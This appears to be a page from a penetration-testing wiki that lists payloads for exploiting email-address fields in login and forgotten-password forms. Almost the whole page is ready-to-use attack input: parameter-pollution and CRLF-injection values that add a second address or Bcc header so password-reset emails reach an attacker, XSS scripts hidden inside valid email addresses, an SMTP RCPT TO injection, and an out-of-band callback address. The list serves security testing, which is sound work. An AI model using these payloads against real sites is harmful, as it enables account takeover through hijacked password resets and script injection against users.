Pentest List Wiki

What is Pentest List Wiki?
OFFENSIVE SECURITY
DEFENSIVE SECURITY
- Forged Kerberos Tickets
- Logon Event Visualisation

Powered by GitBook

On this page

Email Address Form Payloads
Param Manipulation and CRLF Injection
Other checks (XSS, SSRF, SMTP Manipulation)

OFFENSIVE SECURITY

Web Application

Exploitation

Authentication

Email Address Forms

How to exploit login and forgotten password forms.

Email Address Form Payloads

The following payloads can be used when attempting to exploit an email address form

Param Manipulation and CRLF Injection

Use these payloads to try and force the web application to send legitimate password reset emails and such, to a email address you control:

email=user@lol.com&test@test.com
email=user@lol.com%26test@test.com
email=user@lol.com;test@test.com
email=user@lol.com, test@test.com
{”email”:”user@lol.com”,”test@test.com”}
{”email”:[”user@lol.com”,”test@test.com”]}
email=user@lol.com%0D%0ABcc:test@test.com
email=user@lol.com%0ABcc:test@test.com
email=user@lol.com%0DBcc:test@test.com
email=user@lol.com\r\nBcc:test@test.com
email=user@lol.com\nBcc:test@test.com
email=user@lol.com\rBcc:test@test.com

Other checks (XSS, SSRF, SMTP Manipulation)

Use these payloads (which are all valid email addresses according to the RFC) to find other issues.

<svg/onload=alert('XSS')>@test.com
test@test(<svg/onload=alert('XSS')>).com
"<svg/onload=alert('XSS')>"@test.com
"test@gmail.com\r\nRCPT TO:<victim+"@test.com>
test@burpcollab.com
test@[burpcollab.com]

PreviousAuthentication NextAWS Cognito

Last updated 11 months ago